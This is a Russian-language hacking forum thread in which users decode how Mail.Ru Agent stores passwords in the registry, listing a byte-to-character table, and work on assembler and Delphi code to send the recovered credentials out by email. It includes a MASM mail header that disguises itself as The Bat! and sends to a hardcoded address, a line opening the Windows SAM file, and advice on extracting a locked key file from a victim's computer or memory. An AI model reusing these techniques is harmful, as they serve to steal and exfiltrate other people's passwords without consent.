Покопался тут в реестре ,нашёл где хранятся пароли.

Создаю нового пользователя abc@mail.ru,пароль устанавливаю 12345
в реестре смотрю HKEY_CURRENT_USER / Software / Mail.Ru / Agent /mra_logins.
Смотрю двоичный параметр abc@mail.ru , значение 05 00 00 00 9b 98 99 9e 9f.
05-это длина пароля,потом 00 00 00 (вводил различные пароли всёравно было 00 00 00),
дальше идёт сам пароль(не в открытом виде конечно) 9b 98 99 9e 9f.
Так вот мне интересно у всех ли пароли кодируются подобным образом,приведу некоторые
значения :
цифры: буквы:

0 -9a A -eb
1 -9b B -e8
2 -98 C -e9
3 -99 D -ee
4 -9e E -ef
5 -9f F -ec
6 -9c
7 -9d
8 -92
9 -93

Если кодировка одинаковая то можно сделать программу ,которая будет читать
пароли к мылу из реестра и показывать её уже в нормальном виде.

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

да ..но значит так ! ))) у меня был случай что другое было...

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

вот... попробовал переписать для МАСМ32... криво-криво... но прога запустилась, но слать письмо отказалась...

7340_07.10.2007_CRACKLAB.rU.tgz - SimpleSmtp.zip

| Сообщение посчитали полезным:

хм ... тема тут другая а исходников полно на wasm.ru на форуме набери sendmail и все ...а что переписать то я неоч понял

а ясно на фасме ...ок

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

MaSM mail Sender

f37c_07.10.2007_CRACKLAB.rU.tgz - MailSender.asm

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

"MailHeader" в исходнике я изменил на

Header db 'From: <exe-file@mail.ru>',CrLf ;|îò êîãî
db 'X-Mailer: The Bat! (v2.12.00) Business',CrLf ;|êîñèì ïîä TheBat!
db 'Reply-To: <exe-file@mail.ru>',CrLf ;|îò êîãî
db 'X-Priority: 3 (Normal)',CrLf
db 'To: <exe-file@mail.ru>',CrLf ;|êîìó
db 'Subject: Test mail',CrLf ;|òåìà ïèñüìà
db 'MIME-Version: 1.0',CrLf
db 'Content-Type: text/plain; charset=utf-8',CrLf
db 'Content-Transfer-Encoding: 8bit',CrLf,CrLf,0

;---------------------------------------------------
;------------------ Mail Data ----------------------
Server db 'smtp.mail.ru',0 ;|ñåðâåð
MailFrom db 'MAIL FROM: <exe-file@mail.ru>',CrLf,0 ;|îò êîãî
MailTo db 'RCPT TO: <exe-fil@mail.ru>',CrLf,0 ;|êîìó
;---------- Login/Pass (Base64 Encode) -------------
Login db 'exe-file@mail.ru',CrLf,0
Pass db 'Мой пароль)',CrLf,0


но мне письмо не пришло...

| Сообщение посчитали полезным:

Necromancer13 пишет:
но мне письмо не пришло...

Я когда на Delphi писал прогу ,которая отправляла инфу на мыло (mail.ru) ,то она тоже нихрена не хотела отправлять без авторизации отправителя .

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

MACKLIA
Я когда на Delphi писал прогу ,которая отправляла инфу на мыло (mail.ru) ,то она тоже нихрена не хотела отправлять без авторизации отправителя .

да ладна, я когдато игрался
вод посмотрите кому нада на delphi

-----
Лень - это подсознательная мудрость

| Сообщение посчитали полезным:

не прикрепляется блин

вод http://webfile.ru/1550864

-----
Лень - это подсознательная мудрость

| Сообщение посчитали полезным:

а разве можно отправить без авторизации?
да и на Дельфи чут тупо, я АСМ люблю больше

| Сообщение посчитали полезным:

да и на Дельфи чут тупо, я АСМ люблю больше
ты код посмотри если ассемблер знаешь хорошо там легко переписать




Делфи - сила!

-----
Лень - это подсознательная мудрость

| Сообщение посчитали полезным:

ага... ну только там ведь это делается с помощью Indy...

| Сообщение посчитали полезным:

"Делфи - сила!"

Звучит прикольно... а то все C да C++, в о Delphi мало хорошего слышу, только то, что не учить его, а то свободное время потеряю

| Сообщение посчитали полезным:

какое нах инди?! ты исходник вообще смотрел?

-----
Лень - это подсознательная мудрость

| Сообщение посчитали полезным:

MACKLIA пишет:
она тоже нихрена не хотела отправлять без авторизации отправителя
А в чём проблемма? Почему не авторизивовать отправителя?

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

вообщем проблема такая есть код на асме копипует сам файл все пучком , надо копировать тхт файл смена пути как то не так делается для файла агента как другой путь всунуть ????

InitializeObjectAttributes addr oa, $CCOUNTED_UNICODE_STRING("\SystemRoot\system32\config\SAM"), OBJ_CASE_INSENSITIVE + OBJ_KERNEL_HANDLE, NULL, NULL

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

что то не крепится файло

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

depler
хм... действительно без авторизации

судя по этому примеру pinch3 написал еще более криво чем я думал

спасибо

| Сообщение посчитали полезным:

Necromancer13 пишет:
о Delphi мало хорошего слышу, только то, что не учить его, а то свободное время потеряю

Херню ты слышал
P.S. кстати тема вообще не об этом.

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

ясно...
"какое нах инди?! ты исходник вообще смотрел?"
не... еще нет, скачал, но не посмотрел еще...

| Сообщение посчитали полезным:

Я все мучаюсь файл не крепится , какие мысли по верхнему посту ??????

[url=http://up.spbland.ru/files/07100947/ ]-->Download Source<--[/url]

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

www.wasm.ru/forum/viewtopic.php?id=22602

Ветка форума для смены InitializeObjectAttributes addr oa, $CCOUNTED_UNICODE_STRING("\SystemRoot\system32\config\SAM"), OBJ_CASE_INSENSITIVE + OBJ_KERNEL_HANDLE, NULL, NULL

вопрос открыт ..

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

Хм.. я прешел на ФАСМ, код на МАСМ переводить уже не понадобится...
тоько теперь кто-нить подскажите, плиз, как аттачить к письму файл?

| Сообщение посчитали полезным:

Necromancer13 пишет:
подскажите, плиз, как аттачить к письму файл?
Attachment for Mail Client http://www.masm32.com/board/topic=6578.0

-----
EnJoy!

| Сообщение посчитали полезным:

спасибки...

| Сообщение посчитали полезным:

mak пишет:
смена пути как то не так делается для файла агента как другой путь всунуть ????
Пример на FASM: cocoshare.cc/914641918/zb.7z

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным:

Isaev пишет:
mak пишет:
смена пути как то не так делается для файла агента как другой путь всунуть ????
Пример на FASM: --> Link <--
Все верно 8) это я знаю только когда в драйвере я ищу путь там этам команда не проходит =) я там почти доделал ... времени мало чтоб быстренько

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

а на ФАСМ без авторизации есть?

| Сообщение посчитали полезным:

IsaevIsaev пишет:
cocoshare.cc/255033499/MAgent+Password+Recovery+v1.1.exe
Единственная проблема (для случая данных из памяти), доступ к файлу C:\Documents and Settings\--UserName--\Application Data\Mra\Update\ver.txt при включенном агенте...

Предлагаю посмотреть на задачу с другой стороны - не пытаться утащить с компа пользователя залоченный файл ver.txt, а раскопать его содержимое - из каких данных он лепится. Возможно, это какие-то уникальные характеристики компа (как например раньше использовалась дата БИОСа). Эти данные собрать легче, а затем можно и файлик заново слепить...
Хотя, при запущенном агенте достаточно посмотреть в память - я так и делаю
Но это только при запущенном...

| Сообщение посчитали полезным:

Переписал код Isaev на си. Работает, ессно при выключенном.
В то же время "Архиватор Windows" может архивировать любые занятые файлы.. Как бы его запустить фоново? А потом их архива выдрать ver.txt?

| Сообщение посчитали полезным:

Somik пишет:
Возможно, это какие-то уникальные характеристики компа (как например раньше использовалась дата БИОСа).
Не прокатит... Попробуй стереть ver.txt он теряет все пароли и создаёт абсолютно другой ver.txt

-=mazay=-
А "Архиватор Windows" это что?

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным: